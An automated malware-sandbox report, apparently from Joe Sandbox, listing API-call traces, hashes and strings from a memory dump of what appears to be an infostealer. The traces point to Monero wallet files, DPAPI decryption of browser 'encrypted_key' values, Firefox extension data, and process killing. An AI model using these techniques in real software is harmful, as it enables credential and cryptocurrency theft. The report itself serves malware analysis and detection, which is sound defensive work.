                          • Instruction Fuzzy Hash: D01151B1A44705EBD704CF94ED89FBBBBB9FB08712F104259F605A7290D77858018FA1
                          APIs
                          • StrStrA.SHLWAPI(0111DF48,?,?,?,0062140C,?,0111DF48,00000000), ref: 0062926C
                          • lstrcpyn.KERNEL32(0085AB88,0111DF48,0111DF48,?,0062140C,?,0111DF48), ref: 00629290
                          • lstrlen.KERNEL32(?,?,0062140C,?,0111DF48), ref: 006292A7
                          • wsprintfA.USER32 ref: 006292C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 8b5e3bda8f250cf9306b568113c28155fb3cf6d756dc157036502434961d3efa
                          • Instruction ID: 2e52ee098eba0c63bca8ac7d452adb84ee4fe77ce6c3c30d506bc4836cc67150
                          • Opcode Fuzzy Hash: 8b5e3bda8f250cf9306b568113c28155fb3cf6d756dc157036502434961d3efa
                          • Instruction Fuzzy Hash: D301AD75900209FFCB08DFD8D994DAD7BB9FB48355F108248F90997204C6359A44DBE2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006112B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006112BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006112D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006112F5
                          • RegCloseKey.ADVAPI32(?), ref: 006112FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 9f3208642e1c652686511f0477f1520c9bb18349b29fbb77d6351d0e7d494cfc
                          • Instruction ID: 6c9526ac31729a9a9de378b8a050e671b0637dc9714c64fc4b2c83acde73f620
                          • Opcode Fuzzy Hash: 9f3208642e1c652686511f0477f1520c9bb18349b29fbb77d6351d0e7d494cfc
                          • Instruction Fuzzy Hash: 830112B5A40308BBDB04DFD0DC89FAEB7B8FB48702F008155FA0597280D6759A418B51
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00626663
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00626726
                          • ExitProcess.KERNEL32 ref: 00626755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: bc1dbc9eb4e7f40eb6524f4fa51bfd6f6727a42cccb9eda2778a1e323e6981d9
                          • Instruction ID: 2f7a79778b4ed7a8cbd9606adb348efeae16039a89e3557ccc9dc4fa0121e19a
                          • Opcode Fuzzy Hash: bc1dbc9eb4e7f40eb6524f4fa51bfd6f6727a42cccb9eda2778a1e323e6981d9
                          • Instruction Fuzzy Hash: 34312DB1C01628ABDB54EB90EC92FDD7779BF08300F404199F20566191DFB86B88CF5A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00630E28,00000000,?), ref: 0062882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00628836
                          • wsprintfA.USER32 ref: 00628850
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 8057caba3127e02b19aabb8b5563dd6f49ed7aa0f7d46ba15d5f3529e0230147
                          • Instruction ID: bcb20b9407f35ce14c94556ea852027de05656352e3963c3f940822515158785
                          • Opcode Fuzzy Hash: 8057caba3127e02b19aabb8b5563dd6f49ed7aa0f7d46ba15d5f3529e0230147
                          • Instruction Fuzzy Hash: 332100B1A40308AFDB04DF94DD85FAEBBB9FB48712F104259F605A7280C77999018BA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0062951E,00000000), ref: 00628D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00628D62
                          • wsprintfW.USER32 ref: 00628D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 343a2fdc161188719ef2d2e423e07810a68fcb57ad5effdd010ed255252379c0
                          • Instruction ID: f06039924d542722ac5d9c83453159323ff6e19938fb6136b8171596ab3f1361
                          • Opcode Fuzzy Hash: 343a2fdc161188719ef2d2e423e07810a68fcb57ad5effdd010ed255252379c0
                          • Instruction Fuzzy Hash: E0E08CB0A40308BBDB04DB94DC4AE697BB8FB08703F0002A4FE0987280DA759E008B92
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0061A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0061A6BC
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0061A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061D481
                          • lstrlen.KERNEL32(00000000), ref: 0061D698
                          • lstrlen.KERNEL32(00000000), ref: 0061D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0061D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061D801
                          • lstrlen.KERNEL32(00000000), ref: 0061D99F
                          • lstrlen.KERNEL32(00000000), ref: 0061D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0061DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00631580,00630D92), ref: 0061F54C
                          • lstrlen.KERNEL32(00000000), ref: 0061F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00619D39
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619AEF
                            • Part of subcall function 00619AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00614EEE,00000000,?), ref: 00619B01
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619B2A
                            • Part of subcall function 00619AC0: LocalFree.KERNEL32(?,?,?,?,00614EEE,00000000,?), ref: 00619B3F
                            • Part of subcall function 00619B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00619B84
                            • Part of subcall function 00619B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00619BA3
                            • Part of subcall function 00619B60: LocalFree.KERNEL32(?), ref: 00619BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          APIs
                          • memset.MSVCRT ref: 006294EB
                            • Part of subcall function 00628D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0062951E,00000000), ref: 00628D5B
                            • Part of subcall function 00628D50: RtlAllocateHeap.NTDLL(00000000), ref: 00628D62
                            • Part of subcall function 00628D50: wsprintfW.USER32 ref: 00628D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006295AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 006295C9
                          • CloseHandle.KERNEL32(00000000), ref: 006295D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006305B7), ref: 006286CA
                          • Process32First.KERNEL32(?,00000128), ref: 006286DE
                          • Process32Next.KERNEL32(?,00000128), ref: 006286F3
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • CloseHandle.KERNEL32(?), ref: 00628761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 60ff76d51dcbe2f6d9d6cbb0b07ab0a7873768ce4fc237b5ad5f3dc0cd78cc0b
                          • Instruction ID: ac3017a705fb795d3e04005f07cc38d08b98d3ddf436f90eea0517325f579837
                          • Opcode Fuzzy Hash: 60ff76d51dcbe2f6d9d6cbb0b07ab0a7873768ce4fc237b5ad5f3dc0cd78cc0b
                          • Instruction Fuzzy Hash: 93316F71901628ABCB64DF90EC81FEEB779FF48700F10429DE50AA2190DB746A45CFA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00630E00,00000000,?), ref: 006279B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006279B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00630E00,00000000,?), ref: 006279C4
                          • wsprintfA.USER32 ref: 006279F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: b50e750bc0748803387a690e81ee5973c59de8881b49559edcc0aa6d3eb7871f
                          • Instruction ID: 8a672f260fe812559f0b816d721fb704966c8a35dc5bec26413b6c01518bcb69
                          • Opcode Fuzzy Hash: b50e750bc0748803387a690e81ee5973c59de8881b49559edcc0aa6d3eb7871f
                          • Instruction Fuzzy Hash: E9112AB2904218ABCB14DFC9DD85BBEB7F8FB4CB12F10421AF605A2280D23D5940CBB1
                          APIs
                          • __getptd.LIBCMT ref: 0062C74E
                            • Part of subcall function 0062BF9F: __amsg_exit.LIBCMT ref: 0062BFAF
                          • __getptd.LIBCMT ref: 0062C765
                          • __amsg_exit.LIBCMT ref: 0062C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0062C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 1240a9ce71714f860901d1662d7fa5348c00783ff8516018ec4db21f9e962c11
                          • Instruction ID: 52713b9fd15224be72f799228553e0b101db82d8534a0bdffd6c0636b41a96b7
                          • Opcode Fuzzy Hash: 1240a9ce71714f860901d1662d7fa5348c00783ff8516018ec4db21f9e962c11
                          • Instruction Fuzzy Hash: DBF09032900E309BD7A1BFB87806B9D33A3AF00730F21514DF505A62D2CB645941EE9E
                          APIs
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00624F7A
                          • lstrcat.KERNEL32(?,00631070), ref: 00624F97
                          • lstrcat.KERNEL32(?,01119278), ref: 00624FAB
                          • lstrcat.KERNEL32(?,00631074), ref: 00624FBD
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 0062492C
                            • Part of subcall function 00624910: FindFirstFileA.KERNEL32(?,?), ref: 00624943
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FDC), ref: 00624971
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FE0), ref: 00624987
                            • Part of subcall function 00624910: FindNextFileA.KERNEL32(000000FF,?), ref: 00624B7D
                            • Part of subcall function 00624910: FindClose.KERNEL32(000000FF), ref: 00624B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 8c6ed26ad45f5fb27a400f380ca73c92f75ad990ec395c67c99dbcba4f0aa8bc
                          • Instruction ID: e147056aebf190b86dfbcc911a5f8af5ce331fac71f23d1d3bc91c67e4cb45bd
                          • Opcode Fuzzy Hash: 8c6ed26ad45f5fb27a400f380ca73c92f75ad990ec395c67c99dbcba4f0aa8bc
                          • Instruction Fuzzy Hash: D821CBB69003186BC798F7B0EC86EED333EBB54301F004658B64997181EE7596CC8F96